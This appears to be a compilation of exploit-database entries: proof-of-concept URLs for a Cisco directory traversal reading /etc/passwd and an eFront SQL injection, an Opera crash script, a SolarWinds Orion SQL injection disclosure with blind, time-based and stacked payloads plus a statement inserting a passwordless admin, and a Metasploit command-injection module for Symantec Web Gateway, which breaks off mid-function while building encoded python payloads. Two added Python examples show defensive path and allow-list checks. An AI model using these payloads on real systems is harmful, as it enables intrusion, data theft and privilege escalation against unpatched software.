source: https://www.securityfocus.com/bid/50372/info

Multiple Cisco products are prone to a directory-traversal vulnerability.

Exploiting this issue will allow an attacker to read arbitrary files from locations outside of the application's current directory. This could help the attacker launch further attacks.

This issue is tracked by Cisco BugID CSCts44049 and CSCth09343.

The following products are affected:

Cisco Unified IP Interactive Voice Response
Cisco Unified Contact Center Express
Cisco Unified Communications Manager 

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd

http://www.example.com/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../usr/local/platform/conf/platformConfig.xml 
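The server-side check that stops requests like the two above, as an added example (not Cisco's code and not part of the original advisory): the requested name is resolved against a fixed audio directory and refused if the real path lands outside it. The directory layout, file names and function names are assumptions constructed for the demonstration.

```python
import os
import tempfile
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "http://www.example.com/ccmivr/IVRGetAudioFile.do?file="


def file_param(url):
    """Return the URL-decoded 'file' query parameter, or None if absent."""
    values = parse_qs(urlsplit(url).query).get("file", [])
    return values[0] if values else None


def resolve_audio_file(base_dir, requested):
    """Return the real path of `requested` inside base_dir, or None if refused."""
    if not requested or "\x00" in requested:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ../ sequences and follows symlinks before the comparison
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath compares whole path components, so /srv/audio2 never passes
    # for /srv/audio the way a plain startswith() check would allow
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Serve from a constructed directory tree; True means the file would be returned."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        audio = os.path.join(root, "audio")
        os.mkdir(audio)
        with open(os.path.join(audio, "welcome.wav"), "wb") as fh:
            fh.write(b"RIFF")
        outside = os.path.join(root, "platformConfig.xml")
        with open(outside, "w") as fh:
            fh.write("<constructed/>")
        # a link that lives inside the audio directory but points outside it
        os.symlink(outside, os.path.join(audio, "link.wav"))

        requests = {
            "benign": ENDPOINT + "welcome.wav",
            "dotdot": ENDPOINT + "../platformConfig.xml",
            "encoded": ENDPOINT + "%2e%2e%2fplatformConfig.xml",
            "deep_dotdot": ENDPOINT + "../" * 15 + "etc/passwd",
            "absolute": ENDPOINT + "/etc/passwd",
            "symlink": ENDPOINT + "link.wav",
        }
        for label, url in requests.items():
            results[label] = resolve_audio_file(audio, file_param(url)) is not None
    return results


if __name__ == "__main__":
    for label, served in demo().items():
        print(f"{label:12s} served={served}")
```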
            
source: https://www.securityfocus.com/bid/50419/info

eFront is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.10 is vulnerable; other versions may also be affected. 

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0--

http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1-- 
            
source: https://www.securityfocus.com/bid/50421/info

The Opera Web Browser is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Opera Web Browser 11.52 is vulnerable; other versions may also be affected. 

<script>alert(/\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+
 \r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+
 \n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r+\n+\r/); </script>
            
I found a couple SQL injection vulnerabilities in the core Orion service
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
service provides a consistent configuration and authentication layer across
the products.

To be exact, the vulnerable applications and versions are:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

At first glance, the injections are only available to admins, as the
requests used are on the Manage Accounts page. However, it seems there is
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
AccountManagement.asmx service, which means that even authenticating as
Guest allows for exploitation. By default, the Guest account has no
password and is enabled.

On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
'dir' parameters are susceptible to boolean-/time-based, and stacked
injections. By capturing the AJAX requests made by an admin user to these
endpoints, authenticating as Guest and replacing the admin cookie with the
Guest cookie, you can still make a successful request, and thus a
successful exploitation vector for any authenticated user.

Being a stacked injection, this becomes a privilege escalation at the very
least, as an attacker is able to insert their own admin user. A pull
request for a Metasploit module which should achieve this on any product
using the Orion service as the core authentication management system, using
the GetAccounts endpoint, has been made (
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
module attempts to authenticate as the Guest user with a blank password,
then exploit the SQL injection to insert a new admin with a blank password.

I am not sure if the non-trial versions allow you to specify your own SQL
server, but the trials install a SQL Server Express instance. The SQL user
that the application uses is not an administrator, and the xp_cmd_shell
stored procedure is unavailable.

Within the GetAccounts endpoint:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC



Within the GetAccountGroups endpoint, very similar injection techniques are
available:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC


An example injection to insert an admin user named notadmin with a blank
password using the 'dir' parameter would be:

ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
Group Product Manager – Network Management at Solarwinds for the easy
coordination (you should still have a bug bounty though!).

i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?

i dub thee Molarfriends vulnerability. wheres my markketing tem...

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
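How the two root causes in the advisory above are closed, as an added example (not SolarWinds code and not part of the original post): ORDER BY columns and directions cannot be bound as query parameters, so 'sort' and 'dir' are mapped through an allow-list, and the endpoint checks the caller's role itself. The table layout, role names and function names are assumptions; SQLite stands in for SQL Server, and the rejected inputs are the sort/dir values listed in the advisory.

```python
import sqlite3

# Assumed mapping from client-visible sort keys to fixed SQL identifiers.
SORT_COLUMNS = {
    "Accounts.AccountID": "AccountID",
    "Accounts.GroupPriority": "GroupPriority",
}
DIRECTIONS = ("ASC", "DESC")

# (sort, dir) pairs taken from the payload listing in the advisory.
ADVISORY_INPUTS = [
    ("Accounts.AccountID", "ASC; WAITFOR DELAY '0:0:5'--"),
    ("Accounts.AccountID", "ASC WAITFOR DELAY '0:0:5'--"),
    ("Accounts.AccountID",
     "ASC,(SELECT (CASE WHEN (5791=5791) THEN CHAR(65)+CHAR(83)+CHAR(67) "
     "ELSE 5791*(SELECT 5791 FROM master..sysdatabases) END))"),
    ("Accounts.AccountID; WAITFOR DELAY '0:0:5'--", "ASC"),
    ("Accounts.AccountID WAITFOR DELAY '0:0:5'--", "ASC"),
]


class RejectedSort(ValueError):
    """Raised when sort/dir is not one of the fixed, known-good values."""


def build_query_vulnerable(sort, direction):
    # The pattern the advisory describes: request values pasted into ORDER BY.
    return "SELECT AccountID FROM Accounts ORDER BY " + sort + " " + direction


def build_query_hardened(sort, direction):
    # Only identifiers from the allow-list ever reach the SQL text.
    column = SORT_COLUMNS.get(sort)
    if column is None:
        raise RejectedSort("unknown sort key")
    if direction not in DIRECTIONS:
        raise RejectedSort("unknown sort direction")
    return f"SELECT AccountID FROM Accounts ORDER BY {column} {direction}"


def make_db():
    """Constructed sample data in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Accounts (AccountID TEXT PRIMARY KEY, GroupPriority INTEGER)"
    )
    conn.executemany(
        "INSERT INTO Accounts VALUES (?, ?)",
        [("admin", 1), ("guest", 3), ("ops", 2)],
    )
    return conn


def get_accounts(conn, session_role, sort, direction):
    # The ACL check lives in the endpoint, not only on the page that calls it.
    if session_role != "admin":
        raise PermissionError("account management requires an admin session")
    return [row[0] for row in conn.execute(build_query_hardened(sort, direction))]


def rejected_count(conn):
    """Number of advisory inputs the hardened endpoint refuses for an admin caller."""
    rejected = 0
    for sort, direction in ADVISORY_INPUTS:
        try:
            get_accounts(conn, "admin", sort, direction)
        except RejectedSort:
            rejected += 1
    return rejected


if __name__ == "__main__":
    db = make_db()
    print(get_accounts(db, "admin", "Accounts.GroupPriority", "ASC"))
    print("rejected", rejected_count(db), "of", len(ADVISORY_INPUTS))
    print(build_query_vulnerable(*ADVISORY_INPUTS[0]))
```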
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
      'Description'    => %q{
          This module exploits a command injection vulnerability found in Symantec Web
        Gateway's setting restoration feature. The filename portion can be used to inject
        system commands into a syscall function, and gain control under the context of
        HTTP service.

        For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
        However, for version 5.2.1, you must be an administrator.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Egidio Romano', # Original discovery & assist of MSF module
          'sinn3r'
        ],
      'References'     =>
        [
          [ 'CVE', '2014-7285' ],
          [ 'OSVDB', '116009' ],
          [ 'BID', '71620' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
          [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
        ],
      'Payload'        =>
        {
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic python'
            }
        },
      'DefaultOptions' => {
        'RPORT'      => 443,
        'SSL'        => true,
        'SSLVersion' => 'TLS1'
      },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Symantec Web Gateway 5', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
        OptString.new('USERNAME', [true, 'The username to login as']),
        OptString.new('PASSWORD', [true, 'The password for the username'])
      ], self.class)
  end

  def protocol
    ssl ? 'https' : 'http'
  end

  def check
    uri = target_uri.path
    res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})

    if res && res.body.include?('Symantec Web Gateway')
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def get_sid
    sid = ''

    uri = target_uri.path
    res = send_request_cgi({
      'uri'    => normalize_uri(uri, 'spywall/login.php'),
      'method' => 'GET',
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    sid
  end

  def login(sid)
    uri = target_uri.path
    res = send_request_cgi({
      'uri'    => normalize_uri(uri, 'spywall/login.php'),
      'method' => 'POST',
      'cookie' => sid,
      'headers' => {
        'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
      },
      'vars_post' => {
        'USERNAME' => datastore['USERNAME'],
        'PASSWORD' => datastore['PASSWORD'],
        'loginBtn' => 'Login'
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
    end

    cookies = res.get_cookies
    sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''

    if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
      # Successful login
      return sid
    else
      # Failed login
      fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
    end
  end

  def build_payload
    # As of today (Feb 27 2015), there are only three payloads this module will support:
    # * cmd/unix/generic
    # * cmd/unix/reverse_python
    # * cmd/unix/reverse_python_ssl
    p = payload.encoded

    case datastore['PAYLOAD']
    when /cmd\/unix\/generic/
      # Filter that one out, Mr. basename()
      p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
      p = "python -c \"exec('#{p}'.decode('base64'))\""
    else
      p = p.gsub(/python -c "exec/, 'python -c \\"exec')
      p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
    end

    p
